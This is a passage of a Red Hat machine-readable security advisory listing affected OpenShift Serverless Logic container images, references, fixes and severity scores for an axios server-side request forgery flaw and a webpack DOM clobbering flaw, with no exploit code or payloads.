"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-39338"
},
{
"category": "external",
"summary": "RHBZ#2304369",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2304369"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-39338",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39338"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-39338"
},
{
"category": "external",
"summary": "https://github.com/axios/axios/releases",
"url": "https://github.com/axios/axios/releases"
},
{
"category": "external",
"summary": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html",
"url": "https://jeffhacks.com/advisories/2024/06/24/CVE-2024-39338.html"
}
],
"release_date": "2024-08-12T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:8023"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "axios: axios: Server-Side Request Forgery"
},
{
"cve": "CVE-2024-43788",
"cwe": {
"id": "CWE-79",
"name": "Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)"
},
"discovery_date": "2024-08-27T17:20:06.890123+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2308193"
}
],
"notes": [
{
"category": "description",
"text": "A DOM Clobbering vulnerability was found in Webpack via `AutoPublicPathRuntimeModule`. DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script through seemingly benign HTML markups in the webpage, for example, through a post or comment, and leverages the gadgets (pieces of JS code) living in the existing javascript code to transform it into executable code. This vulnerability can lead to Cross-site scripting (XSS) on websites that include Webpack-generated files and allow users to inject certain scriptless HTML tags with improperly sanitized name or ID attributes.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "webpack: DOM Clobbering vulnerability in AutoPublicPathRuntimeModule",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The severity of this issue is classified as moderate rather than important due to the specific conditions required for exploitation. DOM Clobbering, while serious, can only be leveraged in environments where an attacker has the ability to inject unsanitized HTML attributes (e.g., `name` or `id`) into a web page. This limits the attack surface to applications that improperly sanitize user input and rely on Webpack-generated files. Furthermore, the exploitation depends on existing vulnerabilities in the sanitization process, rather than the direct execution of arbitrary scripts. As a result, while the issue can lead to XSS, its impact is constrained by the contextual requirement of HTML injection, lowering its overall severity compared to more direct XSS vectors.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:e8835e2bc0797b374b3df1954a641548e3b68ae87e9e361af958510d8a53cb03_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:2d2df1b94c764a5c7ad3a4e6f1815c5a6aca97bb18a7af8f131847ee8ef72da7_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:64e31d00bfe2b447a7453f65ef623438c9f639aec6b080d2800734e30ba3dc03_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-postgresql-rhel8@sha256:8a426b45b19ff2e4e60fc8549867bb197d40facc2fb2bf9bb18602b25eaaec64_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:85869a28f42e085162ef2fb923a82f5eb98aeb814917b3bcbaaaf9f0f5b618b6_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:8ae440545e8279872ef9bc067759058e0e1fdb1ddd3ddc65256ee6168d8387b1_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-ephemeral-rhel8@sha256:c4eaadd36a466917c4892973880b1a0bd0f9f8f3ee6ead074005181a4d10829a_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:0a59dd2b44a7bfa278b681479adc939cca2f659a0c72f756d20101f8abd31fbe_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:1f9af9106baea114fa4925ad83b4e7a78a5ef18a03ddf5c0e320ec1fcc4a897f_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-jobs-service-postgresql-rhel8@sha256:c01aa1d30898b14e49d0dcfa17b09a47af8be48060ac4c5c7d5c9aaabf02534b_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:600ec68c5a02591b7e91e7d68624780b64d93ec38df96e7b0ec7585860553c47_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-kn-workflow-cli-artifacts-rhel8@sha256:787b96f329f6eaa2d7090c6cc9564ef074ecc17dcd4edde245fd6e2c17706fd1_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-management-console-rhel8@sha256:34326328e976b3aeaed0e30aa8c6d5b3e05a3cb61a65f24646c5bedf4254c442_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:65e38cb16fb23ce575e2461ef6a45ed12d7fc506570ff43a6143b31c81d0a4ba_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:92183a5a74862220bf4d2099e4cc7528dcaa460be24ec3e41ad22d94a1305314_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-operator-bundle@sha256:e5e2e0bf4ba63e8c16b711ea23fdf65544f7ed95270828f59020e68351baf766_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:4df659da0c41c40be3baeae236250a210d4e21006fcb3b9e12b6bb033953cc78_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:86085a6e571ebc3fb071823ecf55d84912de3da11a881fc725a47065945bbe28_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-rhel8-operator@sha256:a8a20d7324a8cfc7b7c770e0f2c57586526b96cb53cc4356bf0fa3040a1794fb_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:11820bec2d06cb35ae97955a6ecbb6446dae133b12438387668b56ea9a9cd391_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:173f51cd9894077b1c413b0511583cbfa70972f620e2dde8809dce30c4f274c0_arm64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-builder-rhel8@sha256:3e1171783be9b5d6f673a730a339ea415b0dae44506b682a725889439855c91e_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:73da4612443c573d96937ed8f97f9d2eb4b9fa82a51b2d932b46e8a6b76aac4d_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:75a5f90c7e4ba64ca4713a0cdd505a4715af9c0ad85a4bb88513b6d9a362ae36_ppc64le",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-swf-devmode-rhel8@sha256:c55f775978f92125dac837d72a901d3c2d9bb0b17db5a51ac59127a89d2a5fe9_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2024-43788"
},
{
"category": "external",
"summary": "RHBZ#2308193",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2308193"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2024-43788",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-43788"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-43788"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61",
"url": "https://github.com/webpack/webpack/commit/955e057abc6cc83cbc3fa1e1ef67a49758bf5a61"
},
{
"category": "external",
"summary": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986",
"url": "https://github.com/webpack/webpack/security/advisories/GHSA-4vvj-4cpr-p986"
},
{
"category": "external",
"summary": "https://research.securitum.com/xss-in-amp4email-dom-clobbering",
"url": "https://research.securitum.com/xss-in-amp4email-dom-clobbering"
},
{
"category": "external",
"summary": "https://scnps.co/papers/sp23_domclob.pdf",
"url": "https://scnps.co/papers/sp23_domclob.pdf"
}
],
"release_date": "2024-08-27T17:15:07.967000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-10-14T00:59:58+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:94ce5f16f364c6bf82c2aa19fcca31252c0d2f49478b8f85509db11744319eb2_amd64",
"8Base-RHOSS-1.34:openshift-serverless-1/logic-data-index-ephemeral-rhel8@sha256:ad91aeedfc1a9b9bfdbd12a3c677e1c48105390bff94a7cf979f0819f62a6054_ppc64le",
